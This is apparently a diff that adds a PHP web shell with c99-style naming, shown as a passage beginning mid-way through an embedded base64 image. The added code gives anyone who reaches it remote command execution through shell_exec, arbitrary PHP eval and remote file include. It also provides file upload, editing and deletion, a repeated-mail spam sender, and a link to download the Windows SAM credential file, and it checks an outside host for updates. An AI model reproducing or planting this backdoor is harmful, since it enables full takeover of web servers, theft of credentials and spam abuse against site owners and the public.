+UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
+77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
+DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
+M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
+GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
+LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
+KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
+llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
+YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
+yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
+XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
+dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
+AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  echo base64_decode($images[$_GET['pic']]);
+}
+
+$ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
+//file_array
+$file_tps=array(
+"img"=>array("jpg","bmp","gif","ico"),
+"act" => array("edit","copy","download","delete"),
+"zip" => array("gzip","zip","rar")
+);
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
+if (empty($surl))
+{
+ $surl = "?".$includestr; //Self url
+}
+$surl = htmlspecialchars($surl);
+ @ob_clean();
+//end
+if (isset($_GET['img'])) {
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+    header("Content-type: ".$inf["mime"]);
+    readfile(urldecode($filename));
+    exit;
+
+     }
+ }
+}
+
+
+if (!function_exists(download)) {
+   function download($file) {
+   header('Pragma: anytextexeptno-cache', true);
+      header('Content-type: application/force-download');
+          header('Content-Transfer-Encoding: Binary');
+              header('Content-length: '.filesize($file));
+                  header('Content-disposition: attachment;
+                      filename='.basename($file));
+                          readfile($file);
+                          exit;
+   }
+}
+if (isset($_GET['download'])) {
+download($filename);
+exit;
+}
+
+if (isset($_GET['run'])) {
+echo urldecode($_GET['file']);
+include(urldecode($_GET['file']));
+exit;
+}
+
+
+function check_update() 
+{
+$cur_ver=5; //very important value for updates!Please dont change!
+$newer=$cur_ver+1;
+$url="http://dc3.dl.am/";
+$file=@fopen($url."".$newer.".txt","r") or die ("No updates aviable!");
+$text=fread($file,1000000);
+if (preg_match("/ver=".$newer."/i", $text)) {
+   echo "[+]Update Aviable!...Please download new version from:";
+echo "<br><a href=".$url.$newer.".txt>Version ".$newer."</a>";
+} }
+
+function get_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+echo  $type.join("",$owner).join("",$group).join("",$world);
+}
+
+
+
+if (!function_exists(get_space)) {
+   function get_space($dir) {
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_f = @round(48.7/($all/$free),2);
+echo "".$used_f."";
+     }
+ }
+$sys=strtolower(substr(PHP_OS,0,3));
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+echo "<img  src=".$surl."?&".$word."&dir&pic=o.b height= width=>";
+echo getenv('SERVER_SOFTWARE');
+echo "<br>";
+echo getenv('SERVER_NAME');
+echo ":";
+echo getenv('SERVER_PORT');
+echo "<br>";
+echo getenv('SERVER_ADMIN');
+
+if ($sys=="win") {
+echo "Windows";
+echo "<br>";
+echo  "".getenv('COMPUTERNAME')."";
+echo "<br>";
+echo "Os:".getenv('OS')."";
+} else {
+echo "<br>Linux";
+}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+$safe=1;
+echo "<br><font color=red>ON (secure)</font>";
+ } else {
+$save=2;
+if ($sys=="win") {
+echo "<br><font color=green><a href=".$surl."?&".$word."&file_browser&file=C:/Windows/repair/sam&download>Off (not secure)</a></font>";
+}
+}
+if (isset($_GET['file']))  {
+echo "<br>Access:";
+if (@is_readable($j_f)) {
+   echo "R";
+}
+if (@is_executable($j_f)) {
+ echo "E";
+}
+if (@is_writable($j_d)) {
+echo "W";
+}
+echo "<br>Current_file:";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($p) ;
+echo ">".$p."</a>";
+ }
+echo "<br>";
+echo "Start_dir:";
+echo "&ensp;&ensp;&ensp;";
+echo "<a href=".$surl."?&".$word."&file_browser&file=";
+echo urlencode($ps);
+echo ">".$ps."</a>";
+echo "<br>";
+if (isset($_GET['file'])) {
+echo "Free Space:";
+get_space(urldecode($_GET['file']));
+
+echo "gb";
+}
+echo "</td>";
+?>
+
+<style type="text/css">
+body { background-color:#8B8989;font-family:trebuchet Ms; color:black }
+
+textarea {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background:#8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color:#8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color: #8B8989;
+}
+input {
+border-top-width: 1px; 
+font-weight: bold; 
+border-left-width: 1px; 
+font-size: 10px; 
+border-left-color: #8B8989; 
+background: #8B8989; 
+border-bottom-width: 1px; 
+border-bottom-color: #8B8989; 
+color: black; 
+border-top-color:#8B8989; 
+font-family: trebuchet Ms; 
+border-right-width: 1px; 
+border-right-color:#8B8989;
+}
+td {
+    font-size: 10px; 
+    font-family: verdana;
+}
+th {
+    font-size: 10px; 
+    font-family: verdana;
+}
+a:link {
+    text-decoration: none;
+}
+a:visited {
+    text-decoration: none;
+        color:blue;
+}
+a:active {
+    text-decoration: none;
+}
+a:hover {
+    color: #00ff00; 
+    text-decoration: none;
+}
+back {
+background-color:grey;
+}
+ ul#Navigation {
+position:absolute;
+    width: 10em;
+    margin: 0; padding: 0.8em;
+    border: 1px solid #8B8989;
+    background-color: #8B8989;
+  }
+  * html ul#Navigation {  /* Korrekturen fuer IE 5.x */
+    width: 11.6em;
+    w\idth: 10em;
+    padding-left: 0;
+    padd\ing-left: 0.8em;
+  }
+  ul#Navigation li {
+    list-style: none;
+    margin: 0.4em; padding: 0;
+  }
+
+  ul#Navigation a {
+    display:block;
+    padding: 0.2em;
+    text-decoration: none; font-weight: bold;
+    border: 1px solid black;
+    border-left-color: black; border-top-color: black;
+    color: black; background-color: #8B8989;
+  }
+  * html ul#Navigation a {  /* Breitenangaben nur fuer IE */
+    width: 100%;
+    w\idth: 8.8em;
+  }
+  ul#Navigation a:hover {
+    border-color: white;
+    border-left-color: black; border-top-color: black;
+    color: white; background-color: #8B8989;
+  }
+</style>
+
+<?php
+if (!function_exists(rename_all)) {
+    function rename_all($dir,$prefix,$name,$del) {
+     $r_dir=opendir($dir);
+       while (false !== ($file_r = readdir($r_dir))) {
+         if (@filetype($dir."/".$file_r)=="file") {
+           $i++;
+        @copy($dir."/".$file_r,$dir."/".$i.".".$prefix.$name) or die ("[-]Error renaming file : ".$file_r."");
+         if ($del=="yes") {
+          @unlink($dir."/".$file_r) or die ("[-]Error deleting file(s)!");
+        }
+       }
+       
+      }
+       echo "Successfully renamed file(s)!";
+    }
+  }
+        
+        
+
+if (!function_exists(get_perms)) {
+     function get_perms($file) {
+    if (@file_exists($file)) {
+      if (@is_readable($file)) {
+        echo "<b>R</b>";
+         }
+           if (@is_executable($file)) {
+            echo "<b>E</b>";
+             }
+               if (@is_writable($file)) {
+                echo "<b>W</b>";
+                }
+              } else {
+                 echo "[-]Error";
+               }
+            }
+          }
+
+if (!function_exists(search_file)) {
+   function search_file($search,$dir) {
+    global $word;
+     global $surl;
+    $d_s=opendir($dir);
+    while (false !== ($file_s = readdir($d_s))) {
+      if (preg_match("/".$search."/i",$file_s))   {
+         echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($dir)."/".urlencode($file_s).">".$file_s."</a><br>";
+         }
+       }
+     }
+   }
+
+
+if (!function_exists(copy_file)) {
+    function copy_file($file,$to) {
+   if (@file_exists($file)) {
+     @copy($file,$to) or die ("[-]Error copying file!");
+      echo "Successfully copied file!";
+       } else {
+           echo "[-]File Doesnt exist!";
+       }
+    }
+ }
+
+if (!function_exists(send_mail)) {
+   function send_mail($from,$to,$text,$subject,$times) {
+              while ($i<$times) {
+               $i++;
+               $header  = "From: $from\r\n";    
+                @mail($to, $subject, $text, $header) or die ("[-]Error sending mail(s)!");
+
+              }
+                   echo "Successfully sent mail(s) to ".$to."!";
+   }
+ }
+
+
+if (!function_exists(read_file)) {
+   function read_file($file) {
+$file=@fopen($file,"r");
+echo fread($file,10000);
+fclose($file);
+       }
+     }
+
+if (!function_exists(write_file)) {
+   function write_file($file,$text) {
+     if (@is_writable($file)) {
+      if (@file_exists($file)) {
+        $file_w=@fopen(urldecode($file),"w") or die ("[-]Error");
+         if (fwrite($file_w,$text)) {
+            echo "Successfully written to file(s)!";
+          }
+        }
+     }
+           else {
+           echo "[-]Error";
+            exit;
+     }
+   }
+ }
+      
+
+
+if (!function_exists(count_all)) {
+     function count_all($dir) {
+       $c_d=opendir($dir);
+        while (false !== ($file_c = readdir($c_d))) {
+         if (@filetype($dir."/".$file_c)=="file") {
+            $file_c_s++;
+         } 
+           else 
+         { 
+            $dir_c++;
+         }
+        }
+       echo "Directories:";
+        echo $dir_c++;
+         echo "||";
+          echo "Files:";
+            echo $file_c_s;
+     }
+}
+
+if (!function_exists(check_access)) {
+   function check_access($file) {
+     if (@is_readable($file)) {
+       echo "R";
+        }
+         if (@is_executable($file)) {
+           echo "E";
+             } 
+              if (@is_writable($file)) {
+                echo "W"; 
+                 }
+              } 
+           }
+
+if (!function_exists(clear_dir)) {
+   function clear_dir($dir) {
+$o_d=opendir($dir);
+   while (false !== ($file = readdir($o_d))) {
+    if (@filetype(urldecode($_GET['file'])."/".$file)=="file") {
+unlink(urldecode($dir)."/".$file) or die ("[-]Error @ file:".$file."");
+   }
+ }
+echo "Successfully cleared directory!";
+   }
+ }
+
+?>
+
+
+<?php
+// real code start !
+
+
+if (isset($_GET['update'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+check_update();
+exit;
+}
+if (isset($_GET['rmdir']))  {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+@rmdir($_GET['file']) or die ("[-]Error deleting dir!");
+echo "Successfully deleted dir(s)!";
+exit;
+}
+
+
+if (isset($_GET['upload'])) {
+$uploaddir = urldecode($_POST['file']);
+
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir ."/". $_FILES['userfile']['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "Successfully uploadet file(s)!";
+} else {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+   print "[-]Error";
+}
+exit;
+}
+
+if (isset($_GET['search'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+search_file($_POST['search'],urldecode($_POST['dir']));
+exit;
+}
+
+
+
+
+if (isset($_GET['getenv'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo getenv($_GET['getenv']);
+exit;
+}
+
+
+if (isset($_GET['php_info'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+phpinfo();
+exit;
+}
+
+if (isset($_GET['defined_vars'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<center><textarea rows=40 cols=120>";
+$vars=get_defined_vars();
+print_r($vars);
+echo "</textarea>";
+
+exit;
+}
+
+if (isset($_GET['env'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead><br>
+    <tr><td>";
+$ary=get_defined_vars();
+$it=array_keys($ary);
+foreach ($it as $i) {
+echo "<a href=".$surl."?&".$word."&getenv=".$i.">".$i."</a><br>";
+
+}
+exit;
+}
+
+if (isset($_GET['play'])) {
+echo "<embed src=".urlencode($filename)." autostart=true loop=true hidden=true height=0 width=0>";
+exit;
+}
+
+
+if (isset($_GET['special_crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+echo "<textarea rows=15 cols=90>";
+if (isset($_POST['submit'])) {
+$file=@fopen($_FILES['userfile']['tmp_name'],"r") or die ("[-]Error reading file!");
+$meth=$_POST['crypt'];
+if ($meth=="1") {
+echo htmlspecialchars(md5(fread($file,10000)));
+ } elseif ($meth=="2") {
+      echo htmlspecialchars(crypt(fread($file,10000)));
+}
+    elseif ($meth=="3") {
+     echo htmlspecialchars(sha1(fread($file,10000)));
+  }
+elseif ($meth=="4") {
+     echo htmlspecialchars(crc32(fread($file,10000)));
+}
+   elseif ($meth=="5") {
+     echo htmlspecialchars(urlencode(fread($file,10000)));
+}
+
+   elseif ($meth=="6") {
+     echo htmlspecialchars(urldecode(fread($file,10000)));
+}
+   elseif ($meth=="7") {
+     echo htmlspecialchars(base64_encode(fread($file,10000)));
+}
+
+elseif ($meth=="8") {
+     echo htmlspecialchars(base64_decode(fread($file,10000)));
+}
+
+}
+echo "</textarea><div align=left>";
+
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&special_crypt method="post">
+file: <input name="userfile" type="file"><br><br>
+
+<input type="submit" value="Start" name="submit"><br>
+<input type=radio name=crypt value=1>md5();<br>
+<input type=radio name=crypt value=2>crypt();<br>
+<input type=radio name=crypt value=3>sha1();<br>
+<input type=radio name=crypt value=4>crc32();<br>
+<input type=radio name=crypt value=5>urlencode();<br>
+<input type=radio name=crypt value=6>urldecode();<br>
+<input type=radio name=crypt value=7>base64_encode();<br>
+<input type=radio name=crypt value=5>base64_decode();<br>
+
+<?php
+exit;
+}
+if (isset($_GET['crypt'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&crypt method="post">
+Crypt:<br>
+<textarea rows=12 cols=120 name=crypt>
+</textarea>
+<?php
+$text=$_POST['crypt'];
+?>
+md5:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(md5($text)) ?>><br><br>
+
+crypt:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crypt($text)) ?>><br><br>
+
+sha1:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(sha1($text)) ?>><br><br>
+
+crc32:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(crc32($text)) ?>><br><br>
+
+urlencode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo  htmlspecialchars(urlencode($text)) ?>><br><br>
+
+urldecode:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input size=40 type=text value=<?php echo htmlspecialchars(urldecode($text)) ?>><br><br>
+
+base64_encode:&ensp;<input type=text size=40 value=<?php echo base64_encode($text) ?>><br><br>
+
+base64_decode:&ensp;<input type=text size=40 value=<?php echo base64_decode($text) ?>><br><br>
+<?php
+echo "<input type=submit value=Start></form><form action=".$surl."?&".$word."&special_crypt method=post><input type=submit value=file_inload_crypt>";
+exit;
+}
+
+if (isset($_GET['php_code'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&php_code method="post">
+
+<textarea rows=12 cols=120 name=code>
+</textarea>
+<textarea rows=12 cols=120 readonly>
+<?php
+eval($_POST['code']);
+echo "</textarea>";
+echo "<br><br><input type=submit value=Start>";
+exit;
+}
+
+if (isset($_GET['search_st'])) {
+   if (isset($_POST['search'])) {
+search_file($_POST['search'],$_POST['dir']);
+ }
+exit;
+}
+
+
+if (isset($_GET['rename_all'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+rename_all(urldecode($_POST['d']),$_POST['prefix'],$_POST['name'],$_POST['del']);
+exit;
+}
+
+if (isset($_GET['special_d'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+ $way=$_POST['way'];
+   if ($way=="1") {
+clear_dir($_GET['file']);
+   exit;
+  }
+    if ($way=="2") {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&rename_all method="post">
+Prefix:<br><input type="text" name="prefix"><br>
+Name:<br><input type="text" name="name"><br>
+<input type="hidden" name="d" value=<?php echo urlencode($filename) ?>>
+Delete old files?:<input type="radio" name="del" value="yes"><br>
+<br><input type="submit" value="Rename">
+<?php
+exit;
+}
+}
+
+
+if (isset($_GET['special_dir'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead><br>
+    <tr><td>";
+?>
+
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&special_d&file=<?php echo urlencode($filename) ?> method=post>
+<input type="radio" name="way" value="1">Clear Dir<input type=hidden name=dir value=<?php echo urlencode($filename) ?>><br><br>
+<input type="radio" name="way" value="2">Rename with prefix<br><br>
+<input type="submit" name="sub" value="Start">
+<?php
+exit;
+}
+
+if (isset($_GET['delete'])) {
+   if (@file_exists($filename)) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+    @unlink($filename) or die ("[-]Error deleting file!");
+     echo "Successfully Deleted File!";
+      exit;
+   }
+}
+
+if (isset($_GET['save'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+     write_file(urldecode($_POST['file']),stripslashes($_POST['text']));
+   
+   exit;
+}
+
+if (isset($_GET['exec'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td><center>";
+@chdir(urldecode($_POST['dir']));
+echo "<textarea rows=15 cols=114>";
+echo shell_exec($_POST['command']);
+echo "</textarea>";
+exit;
+}
+
+
+if (isset($_GET['mkdir'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     mkdir(urldecode($_POST['dir'])."/".$_POST['name']) or die ("[-]Error creating dir!");
+     echo "Successfully created dir!";
+   }
+exit;
+}
+
+if (isset($_GET['mkfile'])) {
+   if (isset($_POST['name'])) {
+echo "<center><table border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+$dir=urldecode($_POST['dir']);
+$filed=$_POST['name'];
+
+       if (@file_exists($dir."/".$filed)) {
+     echo "[-]Allready exists!";
+      exit;
+     }
+    $file_c=@fopen($dir."/".$filed,"w") or die ("[-]Can't create file!");
+     echo "Scuessfully created file(s)!";
+   }
+exit;
+}
+
+if (isset($_GET['edit'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+   if (@file_exists($filename)) {
+     echo "<form action=".$surl."?&".$word."&save method=post><textarea rows=15 cols=90 name=text>";
+      read_file($filename);
+       echo "</textarea><br><br><input type=hidden name=file value=".urlencode($_GET['file'])."><input type=submit name=sub value=Save>";
+       }
+    exit;
+}
+
+
+
+if (isset($_GET['copy_start'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+copy_file($_POST['from'],$_POST['to']);
+exit;
+}
+
+
+
+if (isset($_GET['copy_file']))  {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&copy_start method="post">
+New:<br><textarea rows=4 cols=70 name="to"><?php echo realpath($filename) ?></textarea><br><br>
+Old:<br><textarea rows=4 cols=70 name="from"><?php echo realpath($filename) ?></textarea><br><br>
+<input type="submit" name="sub" value="Copy">
+<?php
+exit;
+}
+
+if (isset($_GET['send_mail_st'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+
+    <tr><td>";
+if (isset($_POST['from'])) 
+{
+if (isset($_POST['to'])) 
+{
+if (isset($_POST['text'])) 
+{
+if (isset($_POST['subject']))
+{
+if (isset($_POST['times']))
+{
+send_mail($_POST['from'],$_POST['to'],$_POST['text'],$_POST['subject'],$_POST['times'])  ; 
+exit;
+}
+}
+}
+}
+}
+}
+if (isset($_GET['send_mail'])) {
+echo "<center><table border=\"1\" width=600 rules=\"groups\">
+  <thead>
+    <tr><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&send_mail_st method="post">
+From:&ensp;&ensp;&ensp;&ensp;<input type="text" name="from"><br><br>
+To:&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="text" name="to"><br><br>
+Subject:&ensp;&ensp;<input type="text" name="subject"><br><br>
+Times:&ensp;&ensp;&ensp;<input type="text" name="times"><br><br>
+
+Text:<br><textarea rows=15 cols=60 name="text"></textarea><br><br>
+<input type="submit" name="sub" value="Send!">
+<?php
+exit;
+}
+if (isset($_GET['file_browser'])) {
+
+   for ($i=0;$i<4;$i++) {
+     if (preg_match("/".$file_tps["img"][$i]."/i",$extn)) {
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr><td>";
+     echo "<a href=".$surl."?&".$word."&file_browser&file=".urlencode($filename)."&img><img src='".urldecode($surl)."?&".$word."&file=".urldecode($filename)."&img' height= width= border=0><br>";
+  exit;
+}  }
+
+
+
+if (@filetype($j_f)=="file") {
+echo "<center><table border=\"1\" rules=\"groups\" 
+  <thead>
+    <tr><td>";
+highlight_file($j_f);
+
+exit;
+}
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td>";
+count_all($j_d);
+echo "</tr>";
+echo "<center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th>Filename</th><th>Edit</th><th>Copy</th><th>Download</th><th>Delete<th>Perms</th><th>Access</th> ";
+
+
+
+
+$o_d=opendir($j_d);
+
+
+
+   while (false !== ($file = readdir($o_d))) {
+     echo " <tbody>
+
+    <tr>
+      <td>";
+if (@filetype($j_d."/".$file)=="dir") {
+echo "</a><img  src=".$surl."?&".$word."&dir&pic=dir height=12 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[".$file."]";
+} else {
+echo "<img  src=".$surl."?&".$word."&dir&pic=ext_wri height=9 width=><a href=".$surl."&".$word."&&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+echo $file;
+}
+echo "<br></a></td><td><a href=".$surl."&".$word."&edit&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Edit]";
+}
+else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&copy_file&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Copy]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&download&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Download]";
+} else {
+echo "</a><center>[-]";
+}
+echo "</a></td><td><a href=".$surl."&".$word."&delete&file_browser&file=".urlencode($j_d)."/".urlencode($file).">";
+if (@filetype($j_d."/".$file)=="file") {
+echo "<center>[Delete]";
+} else {
+echo "</a><center><a href=".$surl."&".$word."&rmdir&file_browser&file=".urlencode($j_d)."/".urlencode($file).">[Delete]</a>";
+} 
+echo "<td><center>";
+echo @fileowner($j_f."/".$file);
+echo "</td>";
+echo "<td><center>";
+get_perms(fileperms($j_f."/".$file));
+echo "</td>";
+echo "</a></td>";
+ }
+echo "<center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form enctype="multipart/form-data" action=<?php echo $surl ?>&<?php echo $word ?>&upload method="post">
+file: &ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input name="userfile" type="file">
+<input type="hidden" name="file" value=<?php echo urlencode($_GET['file']) ?>>
+<input type="submit" value="Upload"><br><br><?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+?>
+</form>
+
+<?php
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&search method="post">
+search: &ensp;&ensp;&ensp;&ensp;<input name="search" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="Search">
+</form>
+<?php
+
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+  <thead>
+
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&mkdir method="post">
+name: &ensp;&ensp;&ensp;&ensp;&ensp;<input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkdir">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
+name:&ensp;&ensp;&ensp;&ensp;&ensp; <input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkfile">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
